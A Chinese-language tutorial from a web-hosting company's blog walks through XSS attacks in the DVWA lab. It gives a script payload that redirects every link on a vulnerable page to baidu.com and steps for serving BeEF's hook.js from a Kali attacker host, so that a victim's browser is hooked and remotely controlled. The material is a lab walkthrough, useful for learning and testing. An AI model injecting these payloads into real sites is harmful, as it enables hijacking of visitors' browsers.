這篇文章給大家介紹XSS漏洞的惡意鏈接是怎樣的,內(nèi)容非常詳細(xì),感興趣的小伙伴們可以參考借鑒,希望對(duì)大家能有所幫助。
讓客戶(hù)滿(mǎn)意是我們工作的目標(biāo),不斷超越客戶(hù)的期望值來(lái)自于我們對(duì)這個(gè)行業(yè)的熱愛(ài)。我們立志把好的技術(shù)通過(guò)有效、簡(jiǎn)單的方式提供給客戶(hù),將通過(guò)不懈努力成為客戶(hù)在信息化領(lǐng)域值得信任、有價(jià)值的長(zhǎng)期合作伙伴,公司提供的服務(wù)項(xiàng)目有:國(guó)際域名空間、雅安服務(wù)器托管、營(yíng)銷(xiāo)軟件、網(wǎng)站建設(shè)、椒江網(wǎng)站維護(hù)、網(wǎng)站推廣。
一、環(huán)境:DVWA
二、修改網(wǎng)頁(yè)鏈接
1、點(diǎn)擊下面的網(wǎng)址,訪問(wèn)的是不同的內(nèi)容
2、通過(guò)xss漏洞,修改這些網(wǎng)址都指向百度
window.onload:當(dāng)窗口加載時(shí),執(zhí)行匿名函數(shù)
<script>
window.onload=function(){
var link=document.getElementsByTagName("a");
for(j=0;j<link.length;j++){
link[j].href="https://www.baidu.com";
}
}
</script>
3、在漏洞處輸入上面代碼,提交
三、生成惡意鏈接(kali攻擊,win7被攻擊)
1、kali啟動(dòng)beff-xss
2、啟動(dòng)apache服務(wù):service apache2 start
3、cd /var/www/html
修改index.html
<script src="
http://控制端ip:3000/hook.js"></script>
5、被控端上線。
關(guān)于XSS漏洞的惡意鏈接是怎樣的就分享到這里了,希望以上內(nèi)容可以對(duì)大家有一定的幫助,可以學(xué)到更多知識(shí)。如果覺(jué)得文章不錯(cuò),可以把它分享出去讓更多的人看到。
文章名稱(chēng):XSS漏洞的惡意鏈接是怎樣的
本文鏈接:http://m.rwnh.cn/article4/jejjoe.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供手機(jī)網(wǎng)站建設(shè)、網(wǎng)站導(dǎo)航、外貿(mào)建站、網(wǎng)站策劃、動(dòng)態(tài)網(wǎng)站、服務(wù)器托管
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶(hù)投稿、用戶(hù)轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話(huà):028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)
猜你還喜歡下面的內(nèi)容